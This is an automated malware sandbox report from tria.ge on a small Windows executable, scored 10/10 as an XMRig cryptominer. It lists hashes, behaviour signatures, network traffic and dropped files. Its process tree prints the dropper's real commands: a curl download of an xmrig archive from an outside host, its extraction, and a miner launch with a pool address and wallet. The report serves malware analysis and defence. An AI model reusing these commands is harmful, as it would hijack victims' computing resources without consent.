Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

test - Copy (10).exe

windows10-2004-x64

10

test - Copy (11).exe

windows10-2004-x64

10

test - Copy (12).exe

windows10-2004-x64

10

test - Copy (13).exe

windows10-2004-x64

10

test - Copy (14).exe

windows10-2004-x64

10

test - Copy (2).exe

windows10-2004-x64

10

test - Copy (3).exe

windows10-2004-x64

10

test - Copy (4).exe

windows10-2004-x64

10

test - Copy (5).exe

windows10-2004-x64

7

test - Copy (6).exe

windows10-2004-x64

10

test - Copy (7).exe

windows10-2004-x64

10

test - Copy (8).exe

windows10-2004-x64

10

test - Copy (9).exe

windows10-2004-x64

10

test - Copy.exe

windows10-2004-x64

10

test.exe

windows10-2004-x64

10

Resubmissions

11/03/2024, 21:08 UTC

240311-zy7ywsed31 10

11/03/2024, 21:06 UTC

240311-zx53xagd73 10

11/03/2024, 21:02 UTC

240311-zvwrfsec3x 10

11/03/2024, 21:01 UTC

240311-ztxx5aeb9x 10

11/03/2024, 20:59 UTC

240311-zs72psgc56 10

11/03/2024, 20:57 UTC

240311-zrmpdaeb3v 10

11/03/2024, 20:56 UTC

240311-zqzbsagb66 10

11/03/2024, 20:55 UTC

240311-zqlexsgb55 10

11/03/2024, 20:54 UTC

240311-zp4j4sgb43 10

11/03/2024, 20:53 UTC

240311-zplz3agb32 10

Analysis

  • max time kernel
    1043s
  • max time network
    1049s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 20:55 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test - Copy (11).exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
10/10
xmrigminer

Malware Config

Signatures

  • XMRig Miner payload 60 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy (11).exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy (11).exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OZtHCtHU.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:1076
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:1792
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4356

      Network

      • flag-us
        DNS
        72.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        72.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        1488.netlify.app
        curl.exe
        Remote address:
        8.8.8.8:53
        Request
        1488.netlify.app
        IN A
        Response
        1488.netlify.app
        IN A
        3.72.140.173
        1488.netlify.app
        IN A
        18.192.231.252
      • flag-de
        GET
        https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        curl.exe
        Remote address:
        3.72.140.173:443
        Request
        GET /xmrig-6.21.1-gcc-win64.zip HTTP/1.1
        Host: 1488.netlify.app
        User-Agent: curl/7.55.1
        Accept: */*
        Response
        HTTP/1.1 200 OK
        Accept-Ranges: bytes
        Age: 3310
        Cache-Control: public,max-age=0,must-revalidate
        Cache-Status: "Netlify Edge"; hit
        Content-Length: 3336525
        Content-Type: application/zip
        Date: Mon, 11 Mar 2024 20:55:37 GMT
        Etag: "3f561091cdba4bace650b26717533c91-ssl"
        Server: Netlify
        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
        X-Nf-Request-Id: 01HRQMSB6KM63F2Q4EMY071SEJ
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.a-0001.a-msedge.net
        g-bing-com.a-0001.a-msedge.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
      • flag-us
        DNS
        173.140.72.3.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        173.140.72.3.in-addr.arpa
        IN PTR
        Response
        173.140.72.3.in-addr.arpa
        IN PTR
        ec2-3-72-140-173 eu-central-1compute amazonawscom
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=071884DDD9CC622A359F90E2D8776350; domain=.bing.com; expires=Sat, 05-Apr-2025 20:55:37 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: E650B264BEF14CD7BB9B03E38821A912 Ref B: LON04EDGE0811 Ref C: 2024-03-11T20:55:37Z
        date: Mon, 11 Mar 2024 20:55:36 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=071884DDD9CC622A359F90E2D8776350
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=r-_H9NeBHW1qy7KwHWXHhFqm1ovqzWWTwXDeMWH3DWU; domain=.bing.com; expires=Sat, 05-Apr-2025 20:55:38 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 32ADA3EB1EBC4C149D4AAB2FF9CE0EA4 Ref B: LON04EDGE0811 Ref C: 2024-03-11T20:55:38Z
        date: Mon, 11 Mar 2024 20:55:37 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=071884DDD9CC622A359F90E2D8776350; MSPTC=r-_H9NeBHW1qy7KwHWXHhFqm1ovqzWWTwXDeMWH3DWU
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 10D8932E02EC4F41B5067A3DE7787575 Ref B: LON04EDGE0811 Ref C: 2024-03-11T20:55:38Z
        date: Mon, 11 Mar 2024 20:55:37 GMT
      • flag-us
        DNS
        5.179.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        5.179.17.96.in-addr.arpa
        IN PTR
        Response
        5.179.17.96.in-addr.arpa
        IN PTR
        a96-17-179-5deploystaticakamaitechnologiescom
      • flag-us
        DNS
        88.156.103.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        88.156.103.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        88.156.103.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        88.156.103.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        9.228.82.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        9.228.82.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        28.118.140.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        28.118.140.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        195.233.44.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        195.233.44.23.in-addr.arpa
        IN PTR
        Response
        195.233.44.23.in-addr.arpa
        IN PTR
        a23-44-233-195deploystaticakamaitechnologiescom
      • flag-us
        DNS
        195.233.44.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        195.233.44.23.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        86.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        86.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        86.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        86.23.85.13.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        xmr.2miners.com
        xmrig.exe
        Remote address:
        8.8.8.8:53
        Request
        xmr.2miners.com
        IN A
        Response
        xmr.2miners.com
        IN A
        162.19.139.184
      • flag-us
        DNS
        184.139.19.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        184.139.19.162.in-addr.arpa
        IN PTR
        Response
        184.139.19.162.in-addr.arpa
        IN PTR
        p062minerscom
      • flag-us
        DNS
        184.139.19.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        184.139.19.162.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        184.139.19.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        184.139.19.162.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        198.187.3.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        198.187.3.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        103.169.127.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        103.169.127.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        140.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.71.91.104.in-addr.arpa
        IN PTR
        Response
        140.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-140deploystaticakamaitechnologiescom
      • flag-us
        DNS
        29.243.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        29.243.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        150.1.37.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        150.1.37.23.in-addr.arpa
        IN PTR
        Response
        150.1.37.23.in-addr.arpa
        IN PTR
        a23-37-1-150deploystaticakamaitechnologiescom
      • flag-us
        DNS
        120.150.79.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        120.150.79.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.1.37.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.1.37.23.in-addr.arpa
        IN PTR
        Response
        183.1.37.23.in-addr.arpa
        IN PTR
        a23-37-1-183deploystaticakamaitechnologiescom
      • flag-us
        DNS
        183.1.37.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.1.37.23.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        119.110.54.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        119.110.54.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        56.126.166.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        56.126.166.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        56.126.166.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        56.126.166.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        134.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        134.71.91.104.in-addr.arpa
        IN PTR
        Response
        134.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-134deploystaticakamaitechnologiescom
      • flag-us
        DNS
        37.179.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        37.179.17.96.in-addr.arpa
        IN PTR
        Response
        37.179.17.96.in-addr.arpa
        IN PTR
        a96-17-179-37deploystaticakamaitechnologiescom
      • 3.72.140.173:443
        https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        tls, http
        curl.exe
        81.4kB
         3.5MB
         1641
        2758

        HTTP Request

        GET https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

        HTTP Response

        200
      • 204.79.197.200:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=
        tls, http2
        2.2kB
         9.2kB
         22
        18

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e53b52b1248340cb9f19fb245713c956&localId=w:A3E46398-2B40-9BBE-4B55-BFD97648970D&deviceId=6966557507656450&anid=

        HTTP Response

        204
      • 162.19.139.184:2222
        xmr.2miners.com
        xmrig.exe
        5.8kB
         19.8kB
         105
        104
      • 8.8.8.8:53
        72.32.126.40.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        72.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        1488.netlify.app
        dns
        curl.exe
        62 B
         94 B
         1
        1

        DNS Request

        1488.netlify.app

        DNS Response

        3.72.140.173
        18.192.231.252

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        146 B
         159 B
         2
        1

        DNS Request

        228.249.119.40.in-addr.arpa

        DNS Request

        228.249.119.40.in-addr.arpa

      • 8.8.8.8:53
        g.bing.com
        dns
        112 B
         158 B
         2
        1

        DNS Request

        g.bing.com

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.200
        13.107.21.200

      • 8.8.8.8:53
        173.140.72.3.in-addr.arpa
        dns
        71 B
         136 B
         1
        1

        DNS Request

        173.140.72.3.in-addr.arpa

      • 8.8.8.8:53
        5.179.17.96.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        5.179.17.96.in-addr.arpa

      • 8.8.8.8:53
        88.156.103.20.in-addr.arpa
        dns
        144 B
         158 B
         2
        1

        DNS Request

        88.156.103.20.in-addr.arpa

        DNS Request

        88.156.103.20.in-addr.arpa

      • 8.8.8.8:53
        9.228.82.20.in-addr.arpa
        dns
        70 B
         156 B
         1
        1

        DNS Request

        9.228.82.20.in-addr.arpa

      • 8.8.8.8:53
        28.118.140.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        28.118.140.52.in-addr.arpa

      • 8.8.8.8:53
        195.233.44.23.in-addr.arpa
        dns
        144 B
         137 B
         2
        1

        DNS Request

        195.233.44.23.in-addr.arpa

        DNS Request

        195.233.44.23.in-addr.arpa

      • 8.8.8.8:53
        86.23.85.13.in-addr.arpa
        dns
        140 B
         144 B
         2
        1

        DNS Request

        86.23.85.13.in-addr.arpa

        DNS Request

        86.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        xmr.2miners.com
        dns
        xmrig.exe
        61 B
         77 B
         1
        1

        DNS Request

        xmr.2miners.com

        DNS Response

        162.19.139.184

      • 8.8.8.8:53
        184.139.19.162.in-addr.arpa
        dns
        219 B
         102 B
         3
        1

        DNS Request

        184.139.19.162.in-addr.arpa

        DNS Request

        184.139.19.162.in-addr.arpa

        DNS Request

        184.139.19.162.in-addr.arpa

      • 8.8.8.8:53
        198.187.3.20.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        198.187.3.20.in-addr.arpa

      • 8.8.8.8:53
        103.169.127.40.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        103.169.127.40.in-addr.arpa

      • 8.8.8.8:53
        140.71.91.104.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        140.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        29.243.111.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        29.243.111.52.in-addr.arpa

      • 8.8.8.8:53
        150.1.37.23.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        150.1.37.23.in-addr.arpa

      • 8.8.8.8:53
        120.150.79.40.in-addr.arpa
        dns
        72 B
         146 B
         1
        1

        DNS Request

        120.150.79.40.in-addr.arpa

      • 8.8.8.8:53
        183.1.37.23.in-addr.arpa
        dns
        140 B
         133 B
         2
        1

        DNS Request

        183.1.37.23.in-addr.arpa

        DNS Request

        183.1.37.23.in-addr.arpa

      • 8.8.8.8:53
        119.110.54.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        119.110.54.20.in-addr.arpa

      • 8.8.8.8:53
        56.126.166.20.in-addr.arpa
        dns
        144 B
         158 B
         2
        1

        DNS Request

        56.126.166.20.in-addr.arpa

        DNS Request

        56.126.166.20.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      • 8.8.8.8:53
        134.71.91.104.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        134.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        37.179.17.96.in-addr.arpa
        dns
        71 B
         135 B
         1
        1

        DNS Request

        37.179.17.96.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\OZtHCtHU.bat
        Filesize

        421B

        MD5

        67d11b392feb0ad59fc11ff3e79dfeee

        SHA1

        7df5785988cb76c4893773614572c93baaa18717

        SHA256

        69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

        SHA512

        50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

        Download Submit

      • C:\xmrig\xmrig-6.21.1-gcc-win64.zip
        Filesize

        805KB

        MD5

        1692fe729baf8757276e1832898938f7

        SHA1

        ffdf9aa6ae3fe26d147bad3ade6a4a14a85e1997

        SHA256

        cbd27999ef2a907f208a34fbea6e79971f661f838ac4136fab06164f90fae7e4

        SHA512

        6e7bc2e37744578c9def1285b23ed82028f713a2d41facfea7ead5cb5e766aee88a121f2c85ca10d97781e2fd64fc99a6faa9a5cff8e2388a3d55f7d47c38a0b

        Download Submit

      • C:\xmrig\xmrig-6.21.1\xmrig.exe
        Filesize

        454KB

        MD5

        42a84388e6bac7b9c22d4d4c252356e5

        SHA1

        63ee0d9199ca42ddb3ac0dec354c3629c1ea2aae

        SHA256

        80732f80e2018ce941a55db889d3ffdb03625ec9cf222a9a7f7f0457f10419cc

        SHA512

        fe758c41aa1c5589c56dd634de34140245ab835fa68bb563bc560cb0db7458517f973f5814fe3c707aea6c23317406d42f34986aee42273531e2c3645ecd8296

        Download Submit

      • memory/3264-0-0x0000000000010000-0x0000000000018000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3264-5-0x00007FFD8E4E0000-0x00007FFD8EFA1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3264-22-0x00007FFD8E4E0000-0x00007FFD8EFA1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4356-23-0x0000025A1B070000-0x0000025A1B090000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-24-0x0000025A1B0C0000-0x0000025A1B0E0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-25-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-26-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-27-0x0000025A1B0E0000-0x0000025A1B100000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-28-0x0000025A1B100000-0x0000025A1B120000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-29-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-30-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-31-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-32-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-33-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-35-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-36-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-37-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-38-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-39-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-40-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-42-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-43-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-44-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-45-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-46-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-47-0x0000025A1B0E0000-0x0000025A1B100000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-48-0x0000025A1B100000-0x0000025A1B120000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4356-49-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-50-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-51-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-52-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-53-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-54-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-55-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-56-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-57-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-58-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-59-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-60-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-61-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-62-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-63-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-64-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-65-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-66-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-67-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-68-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-69-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-70-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-71-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-72-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/4356-73-0x00007FF634F10000-0x00007FF635A14000-memory.dmp

        Filesize

        11.0MB

        Download

